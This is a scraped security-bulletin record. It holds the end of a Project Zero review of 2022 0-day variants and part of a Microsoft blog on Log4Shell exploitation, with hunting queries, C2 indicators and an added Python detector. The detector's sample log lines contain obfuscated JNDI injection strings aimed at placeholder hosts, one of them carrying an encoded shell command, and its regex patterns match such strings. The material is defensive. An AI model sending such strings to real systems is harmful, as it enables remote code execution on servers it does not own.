Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug. \n\nProduct\n\n| \n\n2022 ITW 0-day\n\n| \n\nVariant \n \n---|---|--- \n \nWindows win32k\n\n| \n\n[CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-21882.html>)\n\n| \n\n[CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) (2021 itw) \n \niOS IOMobileFrameBuffer\n\n| \n\n[CVE-2022-22587](<https://support.apple.com/en-us/HT213053>)\n\n| \n\n[CVE-2021-30983](<https://googleprojectzero.blogspot.com/2022/06/curious-case-carrier-app.html>) (2021 itw) \n \nWindows\n\n| \n\n[CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) (\u201cFollina\u201d)\n\n| \n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (2021 itw) \n \nChromium property access interceptors\n\n| \n\n[CVE-2022-1096](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>)\n\n| \n\n[CVE-2016-5128](<https://bugs.chromium.org/p/chromium/issues/detail?id=619166>) [CVE-2021-30551](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30551.html>) (2021 itw) [CVE-2022-1232](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2280>) (Addresses incomplete CVE-2022-1096 fix) \n \nChromium v8\n\n| \n\n[CVE-2022-1364](<https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html>)\n\n| \n\n[CVE-2021-21195](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_30.html>) \n \nWebKit\n\n| \n\n[CVE-2022-22620](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-22620.html>) (\u201cZombie\u201d)\n\n| \n\n[Bug was originally fixed in 2013, patch was regressed in 2016](<https://googleprojectzero.blogspot.com/2022/06/an-autopsy-on-zombie-in-wild-0-day.html>) \n \nGoogle Pixel\n\n| 
\n\n[CVE-2021-39793](<https://source.android.com/security/bulletin/pixel/2022-03-01>)*\n\n* While this CVE says 2021, the bug was patched and disclosed in 2022\n\n| \n\n[Linux same bug in a different subsystem](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cd5297b0855f17c8b4e3ef1d20c6a3656209c7b3>) \n \nAtlassian Confluence\n\n| \n\n[CVE-2022-26134](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>)\n\n| \n\n[CVE-2021-26084](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) \n \nWindows\n\n| \n\n[CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>) (\u201cPetitPotam\u201d)\n\n| \n\n[CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>) (Patch regressed) \n \nSo, what does this mean?\n\nWhen people think of 0-day exploits, they often think that these exploits are so technologically advanced that there\u2019s no hope to catch and prevent them. The data paints a different picture. At least half of the 0-days we\u2019ve seen so far this year are closely related to bugs we\u2019ve seen before. Our conclusion and findings in the [2020 year-in-review report](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>) were very similar.\n\nMany of the 2022 in-the-wild 0-days are due to the previous vulnerability not being fully patched. In the case of the Windows win32k and the Chromium property access interceptor bugs, the execution flow that the proof-of-concept exploits took were patched, but the root cause issue was not addressed: attackers were able to come back and trigger the original vulnerability through a different path. And in the case of the WebKit and Windows PetitPotam issues, the original vulnerability had previously been patched, but at some point regressed so that attackers could exploit the same vulnerability again. 
In the iOS IOMobileFrameBuffer bug, a buffer overflow was addressed by checking that a size was less than a certain number, but it didn\u2019t check a minimum bound on that size. For more detailed explanations of three of the 0-days and how they relate to their variants, please see the [slides from the talk](<https://github.com/maddiestone/ConPresentations/blob/master/FIRST2022.2022_0days_so_far.pdf>).\n\nWhen 0-day exploits are detected in-the-wild, it\u2019s the failure case for an attacker. It\u2019s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can\u2019t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that effectively, we need correct and comprehensive fixes.\n\nThis is not to minimize the challenges faced by security teams responsible for responding to vulnerability reports. As we said in our 2020 year in review report: \n\nBeing able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done. \n\nExactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.\n\nPractically, some of the following efforts can help ensure bugs are correctly and comprehensively fixed. 
Project Zero plans to continue to help with the following efforts, but we hope and encourage platform security teams and other independent security researchers to invest in these types of analyses as well:\n\n * Root cause analysis\n\nUnderstanding the underlying vulnerability that is being exploited. Also tries to understand how that vulnerability may have been introduced. Performing a root cause analysis can help ensure that a fix is addressing the underlying vulnerability and not just breaking the proof-of-concept. Root cause analysis is generally a pre-requisite for successful variant and patch analysis.\n\n * Variant analysis\n\nLooking for other vulnerabilities similar to the reported vulnerability. This can involve looking for the same bug pattern elsewhere, more thoroughly auditing the component that contained the vulnerability, modifying fuzzers to understand why they didn\u2019t find the vulnerability previously, etc. Most researchers find more than one vulnerability at the same time. By finding and fixing the related variants, attackers are not able to simply \u201cplug and play\u201d with a new vulnerability once the original is patched.\n\n * Patch analysis\n\nAnalyzing the proposed (or released) patch for completeness compared to the root cause vulnerability. I encourage vendors to share how they plan to address the vulnerability with the vulnerability reporter early so the reporter can analyze whether the patch comprehensively addresses the root cause of the vulnerability, alongside the vendor\u2019s own internal analysis.\n\n * Exploit technique analysis\n\nUnderstanding the primitive gained from the vulnerability and how it\u2019s being used. While it\u2019s generally industry-standard to patch vulnerabilities, mitigating exploit techniques doesn\u2019t happen as frequently. While not every exploit technique will always be able to be mitigated, the hope is that it will become the default rather than the exception. 
Exploit samples will need to be shared more readily in order for vendors and security researchers to be able to perform exploit technique analysis.\n\nTransparently sharing these analyses helps the industry as a whole as well. We publish our analyses at [this repository](<https://googleprojectzero.github.io/0days-in-the-wild/rca.html>). We encourage vendors and others to publish theirs as well. This allows developers and security professionals to better understand what the attackers already know about these bugs, which hopefully leads to even better solutions and security overall. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-30T00:00:00", "type": "googleprojectzero", "title": "\n2022 0-day In-the-Wild Exploitation\u2026so far\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128", "CVE-2021-1732", "CVE-2021-21195", "CVE-2021-26084", "CVE-2021-30551", "CVE-2021-30983", "CVE-2021-36942", "CVE-2021-39793", "CVE-2021-40444", "CVE-2022-1096", "CVE-2022-1232", "CVE-2022-1364", "CVE-2022-21882", "CVE-2022-22587", "CVE-2022-22620", "CVE-2022-26134", "CVE-2022-26925", 
"CVE-2022-30190"], "modified": "2022-06-30T00:00:00", "id": "GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "href": "https://googleprojectzero.blogspot.com/2022/06/2022-0-day-in-wild-exploitationso-far.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-01-19T21:27:16", "description": "**_January 10, 2022 recap \u2013_**_ The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. This open-source component is widely used across many suppliers\u2019 software and services. By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment. Customers are encouraged to utilize scripts and scanning tools to assess their risk and impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities._\n\n_In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware._ _We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends customers to do additional review of devices where vulnerable installations are discovered. At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. 
Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance._\n\n_**January 19, 2022 update** - We added new information about an unrelated vulnerability we discovered while investigating Log4j attacks._\n\nThe remote code execution (RCE) vulnerabilities in Apache Log4j 2 referred to as \u201cLog4Shell\u201d ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>)) has presented a new attack vector and gained broad attention due to its severity and potential for widespread exploitation. The majority of attacks we have observed so far have been mainly mass-scanning, coin mining, establishing remote shells, and red-team activity, but it\u2019s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits.\n\nWith nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>) for technical information about the vulnerabilities and mitigation recommendations.\n\nMeanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats. This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. It also provides our recommendations for using Microsoft security solutions to (1) find and remediate vulnerable services and systems and (2) detect, investigate, and respond to attacks.\n\nThis blog covers the following topics:\n\n 1. 
**Attack vectors and observed activity**\n 2. **Finding and remediating vulnerable apps and systems**\n * Threat and vulnerability management\n * Discovering affected components, software, and devices via a unified Log4j dashboard\n * Applying mitigation directly in the Microsoft 365 Defender portal\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for servers\n * Microsoft Defender for Containers\n * Microsoft Sentinel queries\n * RiskIQ EASM and Threat Intelligence\n 3. **Detecting and responding to exploitation attempts and other related attacker activity**\n * Microsoft 365 Defender\n * Microsoft Defender Antivirus\n * Microsoft Defender for Endpoint\n * Microsoft Defender for Cloud Apps\n * Microsoft Defender for Office 365\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for IoT\n * Microsoft Sentinel\n * Microsoft Sentinel queries\n * Azure Firewall Premium\n * Azure Web Application Firewall (WAF)\n 4. **Indicators of compromise (IoCs)**\n\n## Attack vectors and observed activity\n\nMicrosoft\u2019s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of the remote code execution (RCE) vulnerabilities in [Apache Log4j 2](<https://logging.apache.org/log4j/2.x/>) referred to as \u201cLog4Shell\u201d.\n\nThe bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. 
An example pattern of attack would appear in a web request log with strings like the following:\n\n\n\nAn attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.\n\nThe specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. The string contains \u201cjndi\u201d, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as \u201cldap\u201d, \u201cldaps\u201d, \u201crmi\u201d, \u201cdns\u201d, \u201ciiop\u201d, or \u201chttp\u201d, precedes the attacker domain.\n\nAs security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. We\u2019ve seen things like running a lower or upper command within the exploitation string and even more complicated obfuscation attempts, such as the following, that are all trying to bypass string-matching detections:\n\n\n\nThe vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can perform a myriad of objectives. 
Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.\n\n### Exploitation continues on non-Microsoft hosted Minecraft servers\n\nMinecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. More information can be found here: <https://aka.ms/mclog>.\n\nMicrosoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader.\n\nIn these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.\n\nWhile it\u2019s uncommon for Minecraft to be installed in enterprise networks, we have also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, giving an actor full access to a compromised system, which they then use to run Mimikatz to steal credentials. These techniques are typically associated with enterprise compromises with the intent of lateral movement. 
Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use.\n\nDue to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.\n\n### Nation-state activity\n\nMSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerabilities to in-the-wild payload deployment, and exploitation against targets to achieve the actor\u2019s objectives.\n\nFor example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.\n\nIn addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.\n\n### Access brokers associated with ransomware\n\nMSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. 
We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.\n\n### Mass scanning activity continues\n\nThe vast majority of traffic observed by Microsoft remains mass scanning by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JNDI:ldap:// request to launch bash commands on Linux and PowerShell on Windows.\n\nMicrosoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.\n\n### Additional RAT payloads\n\nWe\u2019ve observed the dropping of additional remote access toolkits and reverse shells via exploitation of CVE-2021-44228, which actors then use for hands-on-keyboard attacks. In addition to the Cobalt Strike and PowerShell reverse shells seen in earlier reports, we\u2019ve also seen Meterpreter, Bladabindi, and HabitsRAT. Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally.\n\nThis activity is split between a percentage of small-scale campaigns that may be more targeted or related to testing, and the addition of CVE-2021-44228 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. 
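The obfuscated lookup strings described in the attack-vector section above (`${lower:j}`, `${::-j}` and similar tricks that defeat plain string matching) and the Base64-encoded commands carried in the `jndi:ldap://` request that this section mentions can both be handled by normalising the Log4j lookup syntax before matching. The following Python is an added example written for this page, not code from the Microsoft post or from any Microsoft tool. The access-log lines are constructed, the `203.0.113.x` addresses are documentation-range placeholders, and the `/Basic/Command/Base64/<payload>` path is an assumption about the layout used by common LDAP exploit servers, not something the post specifies.

```python
import base64
import re
import urllib.parse

# Innermost ${...} lookup: a body with no nested "${" and no "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What should survive normalisation: ${jndi:<scheme>:[//]<target>...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*(?://)?([^}\s/]*)", re.IGNORECASE)
# Path layout used by common LDAP exploit servers (assumption about tooling, not from the post).
_B64_CMD = re.compile(r"/Base64/([A-Za-z0-9+/=]+)")


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j 2 would, or keep it verbatim."""
    body = match.group(1)
    key, sep, rest = body.partition(":")
    key = key.strip().lower()
    if key == "jndi":                      # the lookup we are hunting: never rewrite it
        return match.group(0)
    if key == "lower" and sep:             # ${lower:J} -> j
        return rest.lower()
    if key == "upper" and sep:             # ${upper:j} -> J
        return rest.upper()
    if ":-" in body:                       # ${::-j}, ${env:NOPE:-j} -> default value j
        return body.split(":-", 1)[1]
    return match.group(0)                  # unknown lookup (date, sys, ...): leave as-is


def normalize_lookups(text, max_rounds=20):
    """Undo URL encoding and nested lookup obfuscation so string matching can work."""
    text = urllib.parse.unquote(text)
    for _ in range(max_rounds):             # bounded: deeply nested payloads are finite
        new = _INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def inspect_line(line):
    """Return a hit dict for a log line carrying a JNDI lookup, else None."""
    norm = normalize_lookups(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    end = norm.find("}", m.end())
    hit = {"scheme": m.group(1).lower(), "target": m.group(2),
           "lookup": norm[m.start():(end + 1 if end != -1 else len(norm))],
           "command": None}
    b = _B64_CMD.search(norm)
    if b:
        try:  # validate=True rejects junk that merely looks like base64
            hit["command"] = base64.b64decode(b.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            pass
    return hit


def scan(lines):
    """Run inspect_line over an iterable of log lines and keep the hits with their index."""
    hits = []
    for i, line in enumerate(lines):
        hit = inspect_line(line)
        if hit:
            hit["line"] = i
            hits.append(hit)
    return hits


# Constructed sample access-log lines (not from the post); 203.0.113.0/24 is a documentation range.
_B64 = base64.b64encode(b"touch /tmp/pwned").decode()
SAMPLE_LOG_LINES = [
    '203.0.113.9 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.7:1099/x}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fcanary.example%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/Basic/Command/Base64/' + _B64 + '}"',
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG_LINES):
        print(h)
```

Normalisation only covers the `lower`, `upper` and `:-` default-value forms; other lookups that can smuggle a character (for example `${date:'j'}`) are left untouched, so treat a clean result as evidence rather than proof and pair the string match with the outbound LDAP/RMI/DNS and class-loading telemetry the post describes.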
In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns.\n\n### Webtoos\n\nThe Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities. As reported by [RiskIQ](<https://community.riskiq.com/article/67ba1386>), Microsoft has seen Webtoos being deployed via the vulnerability. Attackers\u2019 use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability.\n\n### A note on testing services and assumed benign activity\n\nWhile services such as _interact.sh_, _canarytokens.org_, _burpsuite_, and _dnslog.cn_ may be used by IT organizations to profile their own threat footprints, Microsoft encourages including these services in your hunting queries and validating observations of these in environments to ensure they are intentional and legitimate activity.\n\n### Exploitation in internet-facing systems leads to ransomware\n\nAs early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.\n\nThese attacks are performed by a China-based ransomware operator that we\u2019re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).\n\nBased on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains. 
These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.\n\n### Attackers propagating Log4j attacks via previously undisclosed vulnerability\n\nDuring our sustained monitoring of threats taking advantage of the Log4j 2 vulnerabilities, we observed activity related to attacks being propagated via a previously undisclosed vulnerability in the SolarWinds Serv-U software. We discovered that the vulnerability, now tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.\n\nWe reported our discovery to SolarWinds, and we\u2019d like to thank their teams for immediately investigating and working to remediate the vulnerability. We strongly recommend affected customers to apply security updates released by referring to the SolarWinds advisory here: <https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>. \n\nMicrosoft customers can use threat and vulnerability management in Microsoft Defender for Endpoint to identify and remediate devices that have this vulnerability. 
In addition, Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malicious behavior related to the observed activity.\n\n## Finding and remediating vulnerable apps and systems\n\n### Threat and vulnerability management\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in Microsoft Defender for Endpoint monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities.\n\n#### Discovering affected components, software, and devices via a unified Log4j dashboard\n\nThreat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate.\n\nThe wide use of Log4j across many supplier\u2019s products challenge defender teams to mitigate and address the risks posed by the vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) or [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)). The threat and vulnerability management capabilities within Microsoft 365 Defender can help identify vulnerable installations. On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities\u2014on the device, software, and vulnerable component level\u2014through a range of automated, complementing capabilities. These capabilities are supported on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to version 101.52.57 (30.121092.15257.0) or later. 
The updates include the following:\n\n * Discovery of vulnerable Log4j library components (paths) on devices\n * Discovery of vulnerable installed applications that contain the Log4j library on devices\n * A [dedicated Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>) that provides a consolidated view of various findings across vulnerable devices, vulnerable software, and vulnerable files\n * Introduction of a new schema in advanced hunting, **DeviceTvmSoftwareEvidenceBeta**, which surfaces file-level findings from the disk and provides the ability to correlate them with additional context in advanced hunting:\n \n \n DeviceTvmSoftwareEvidenceBeta\n | mv-expand DiskPaths\n | where DiskPaths contains \"log4j\"\n | project DeviceId, SoftwareName, SoftwareVendor, SoftwareVersion, DiskPaths\n\nTo complement this new table, the existing **DeviceTvmSoftwareVulnerabilities** table in advanced hunting can be used to identify vulnerabilities in installed software on devices:\n \n \n DeviceTvmSoftwareVulnerabilities \n | where CveId in (\"CVE-2021-44228\", \"CVE-2021-45046\")\n\nThese new capabilities integrate with the existing threat and vulnerability management experience and are gradually rolling out. As of December 27, 2021, discovery is based on installed application CPEs that are known to be vulnerable to Log4j RCE, as well as the presence of vulnerable Log4j Java Archive (JAR) files. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.\n\n\n\n_Figure 1. 
Threat and Vulnerability recommendation __\u201cAttention required: Devices found with vulnerable Apache Log4j versions\u201d_\n\nOn the Microsoft 365 Defender portal, go to **Vulnerability management** > **Dashboard** > **Threat awareness**, then click **View vulnerability details** to see the consolidated view of organizational exposure to the Log4j 2 vulnerability (for example, CVE-2021-44228 dashboard, as shown in the following screenshots) on the device, software, and vulnerable component level.\n\n\n\n_Figure 2. Threat and vulnerability management dedicated CVE-2021-44228 dashboard_\n\n\n\n_Figure 3. Threat and vulnerability management finds exposed paths_\n\n\n\n_Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk_\n\nNote: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft 365 Defender portal with matching recommendations. We will continue to review and update this list as new information becomes available.\n\nThrough [device discovery](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unmanaged-device-protection-capabilities-are-now-generally/ba-p/2463796>), unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.\n\n\n\n_Figure 5. Finding vulnerable applications and devices via software inventory_\n\n#### Applying mitigation directly in the Microsoft 365 Defender portal\n\nWe have released two new threat and vulnerability management capabilities that can significantly simplify the process of turning off JNDI lookup, a workaround that can prevent the exploitation of the Log4j vulnerabilities on most devices, using an environment variable called LOG4J_FORMAT_MSG_NO_LOOKUPS. 
These new capabilities provide security teams with the following:\n\n 1. View the mitigation status for each affected device. This can help prioritize mitigation and/or patching of devices based on their mitigation status.\n\nTo use this feature, open the [Exposed devices tab](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/exposedDevices>) in the dedicated CVE-2021-44228 dashboard and review the **Mitigation status** column. Note that it may take a few hours for the updated mitigation status of a device to be reflected.\n\n\n\n_Figure 6. Viewing each device\u2019s mitigation status_\n\n 2. Apply the mitigation (that is, turn off JNDI lookup) on devices directly from the portal. This feature is currently available for Windows devices only.\n\nThe mitigation will be applied directly via the Microsoft Defender for Endpoint client. To view the mitigation options, click on the **Mitigation options** button in the [Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>):\n\n\n\nYou can choose to apply the mitigation to all exposed devices or select specific devices for which you would like to apply it. To complete the process and apply the mitigation on devices, click **Create mitigation action**.\n\n\n\n_Figure 7. Creating mitigation actions for exposed devices._\n\nIn cases where the mitigation needs to be reverted, follow these steps:\n\n 1. Open an elevated PowerShell window\n 2. Run the following command:\n \n \n [Environment]::SetEnvironmentVariable(\"LOG4J_FORMAT_MSG_NO_LOOKUPS\", $null, [EnvironmentVariableTarget]::Machine)\n\nThe change will take effect after the device restarts.\n\n### Microsoft 365 Defender advanced hunting\n\nAdvance hunting can also surface affected software. This query looks for possibly vulnerable applications using the affected Log4j component. 
Triage the results to determine applications and programs that may need to be patched and updated.

    DeviceTvmSoftwareInventory
    | where SoftwareName contains "log4j"
    | project DeviceName, SoftwareName, SoftwareVersion

_Figure 8. Finding vulnerable software via advanced hunting_

### Microsoft Defender for Cloud

#### Microsoft Defender for servers

Organizations using Microsoft Defender for Cloud can use [Inventory tools](<https://docs.microsoft.com/azure/defender-for-cloud/asset-inventory>) to begin investigations before there's a CVE number. With Inventory tools, there are two ways to determine exposure across hybrid and multi-cloud resources:

